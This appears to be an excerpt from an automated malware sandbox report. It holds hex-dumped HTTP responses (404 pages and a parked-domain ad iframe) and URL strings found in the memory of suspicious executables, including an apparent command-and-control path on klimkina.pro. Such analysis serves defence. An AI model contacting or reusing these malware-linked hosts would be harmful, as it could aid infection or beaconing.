af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60 61 bc
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 05 Jun 2024 16:29:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:Data Raw: 31 33 64 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:29:54 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:29:56 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:29:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:30:02 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:30:08 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:30:10 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:30:13 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 16:30:19 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 2Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }

Source: P1 HWT623ATG.bat.exe, GnVIdcfKFYG.exe.1.dr	String found in binary or memory: http://aliez.tv/
Source: compact.exe, 0000001A.00000002.3721935627.000000000495A000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000359A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://klimkina.pro/4mpz/?9d=Y
Source: compact.exe, 0000001A.00000003.2728107070.0000000008A65000.00000004.00000020.00020000.00000000.sdmp, bfc.exe, 00000022.00000002.2779194364.000000000040A000.00000004.00000001.01000000.00000012.sdmp, bfc.exe, 00000022.00000000.2730951982.000000000040A000.00000008.00000001.01000000.00000012.sdmp, Smilet.exe, 00000028.00000000.3703313892.000000000040A000.00000008.00000001.01000000.00000013.sdmp, Smilet.exe.35.dr, bfc.exe.26.dr, Guzzler[1].exe.26.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: compact.exe, 0000001A.00000003.2728107070.0000000008A65000.00000004.00000020.00020000.00000000.sdmp, bfc.exe, 00000022.00000002.2779194364.000000000040A000.00000004.00000001.01000000.00000012.sdmp, bfc.exe, 00000022.00000000.2730951982.000000000040A000.00000008.00000001.01000000.00000012.sdmp, Smilet.exe, 00000028.00000000.3703313892.000000000040A000.00000008.00000001.01000000.00000013.sdmp, Smilet.exe.35.dr, bfc.exe.26.dr, Guzzler[1].exe.26.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: P1 HWT623ATG.bat.exe, GnVIdcfKFYG.exe.1.dr	String found in binary or memory: http://ozon.ru/
